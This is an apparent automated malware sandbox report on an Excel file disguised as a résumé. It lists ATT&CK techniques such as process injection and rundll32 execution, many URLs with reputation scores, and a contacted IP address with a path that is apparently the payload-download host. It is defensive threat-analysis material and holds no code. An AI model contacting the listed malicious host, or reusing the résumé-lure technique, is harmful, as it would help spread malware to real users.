Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting2Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRundll321LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting2NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%VirustotalBrowse
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
http://209.141.51.196/Lk9tdZ2%VirustotalBrowse
http://209.141.51.196/Lk9tdZ0%Avira URL Cloudsafe
https://asgsmsproxyapi.azurewebsites.net/0%VirustotalBrowse
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://209.141.51.196/Lk9tdZfalse
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
    high
    https://login.microsoftonline.com/77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
      high
      https://shell.suite.office.com:144377C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
          high
          https://autodiscover-s.outlook.com/77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
              high
              https://cdn.entity.77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                high
                https://wus2-000.contentsync.77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://clients.config.office.net/user/v1.0/tenantassociationkey77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                    high
                    https://powerlift.acompli.net77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v177C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                      high
                      https://cortana.ai77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                high
                                https://api.aadrm.com/77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                      high
                                      https://cr.office.com77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControl77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/Office77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                            high
                                            https://graph.ppe.windows.net77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptionevents77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.net77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.com77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplate77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://wus2-000.pagecontentsync.77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.com77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplate77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetect77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                            high
                                                            https://graph.windows.net77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.com77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/api77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetect77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                        high
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspx77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                    high
                                                                                    https://management.azure.com77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                      high
                                                                                      https://incidents.diagnostics.office.com77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/ios77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmedia77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.com77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/Activities77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                high
                                                                                                https://api.office.net77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.com77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                    • 0%, Virustotal, Browse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.com77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocation77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/log77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.com77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                                        high
                                                                                                                        https://ncus-000.contentsync.77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://login.windows.net/common/oauth2/authorize77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/imports77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.com77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                                                high
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://contentstorage.omex.office.net/addinclassifier/officeentities77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://augloop.office.com/v277C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://skyapi.live.net/Activity/77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://clients.config.office.net/user/v1.0/mac77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://dataservice.o365filtering.com77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://api.cortana.ai77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://onedrive.live.com77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://ovisualuiapp.azurewebsites.net/pbiagave/77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://visio.uservoice.com/forums/368202-visio-on-devices77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://directory.services.77C43E78-5473-430D-A2CF-3011B6265ED8.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  209.141.51.196
                                                                                                                                                  unknownUnited States
                                                                                                                                                  53667PONYNETUSfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                  Analysis ID:342307
                                                                                                                                                  Start date:20.01.2021
                                                                                                                                                  Start time:19:12:47
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 4m 28s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:myResume_787.xlsb
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Number of analysed new started processes analysed:17
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal60.expl.evad.winXLSB@3/5@0/1
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:Failed
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xlsb
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  Show All
                                                                                                                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 104.43.139.144, 168.61.161.212, 52.109.76.68, 52.109.8.25, 52.109.88.40, 51.104.144.132, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129, 8.253.204.121, 67.26.75.254, 8.248.143.254, 67.27.159.126, 67.27.157.126, 51.104.139.180
                                                                                                                                                  • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, prod.configsvc1.live.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net, europe.configsvc1.live.com.akadns.net

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  No simulations

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  No context

                                                                                                                                                  Domains

                                                                                                                                                  No context

                                                                                                                                                  ASN

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  PONYNETUSspptqzbEyNlEJvj.exeGet hashmaliciousBrowse
                                                                                                                                                  • 162.244.95.155
                                                                                                                                                  zosFl3kiAK.exeGet hashmaliciousBrowse
                                                                                                                                                  • 162.244.95.61
                                                                                                                                                  GD-5401.docGet hashmaliciousBrowse
                                                                                                                                                  • 162.244.95.61
                                                                                                                                                  Order Requirement 3411.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.195.253.181
                                                                                                                                                  ZtH8MW7sut.exeGet hashmaliciousBrowse
                                                                                                                                                  • 104.244.74.119
